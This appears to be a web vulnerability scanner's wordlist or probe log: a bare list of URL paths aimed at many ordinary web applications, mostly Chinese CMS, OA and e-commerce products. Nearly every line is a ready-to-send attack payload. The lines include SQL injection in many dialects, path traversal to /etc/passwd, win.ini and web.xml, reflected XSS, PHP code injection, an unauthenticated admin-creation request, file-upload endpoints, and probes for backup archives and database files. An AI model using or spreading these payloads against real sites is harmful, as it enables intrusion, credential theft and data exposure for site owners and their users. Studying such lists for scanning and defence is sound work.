/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/ModifyNewsAction.do?newsID=-12
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/manage/Template/DSManage.aspx
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/admin/admin_adminmodifypwd.aspx
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/print/search_print_proof.jsp?proof_no=just_sql_test'
/include/user/mulbumentree.asp
/include/user/usertree.asp
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/public/oa_nodebanliren_frm.asp
/include/chaxundetail.asp
/include/user/bdtreemx.asp
/admin/Fileup.aspx?path=notice/upload
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/mod/ajax.ashx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/dakai.aspx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/getpassword.php?do=login
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/index.php?m=register&c=ajax_reg
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/nicknamelogin.jsp
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/index.php?m=register&c=ajax_reg
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/?q=node&destination=node
/UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
/jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
/govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/api/CheckMemberLogin.ashx?type=mobileisexist
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/LoginCheck.aspx
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/AdminP
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/public/download.asp?filename=../login2.asp/
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/API/DownloadProducts.ashx
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/MShop/Partial/SuppLogo
/ShoppingHandler.aspx
/bq/Data/BIData.zip
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/cms/voteManager/voteaction.jsp
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/ShopManage.aspx
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/SNS/Product/WaterfallProductListData
/ProSales/GetListCate
/jphoto/jphoto/sys/member/opr_export.jsp
/JwGl/jxjh/JxjhXGBc.asp
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/login.asp
/search.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/jwgl/jxjh/jxjha.asp
/jwgl/jcxx/savetofile.asp
/public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
/edoas2/edoas2_test.jsp
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/celive/live/header.php
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/admin/admin_database.aspx
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/backup/index.php
/cctrl/admin/purview/purview.php
/data_Xbaby/gdjm133950.mdb
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/upfile.asp
/admin/upfile_yqhy.asp
/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/
/
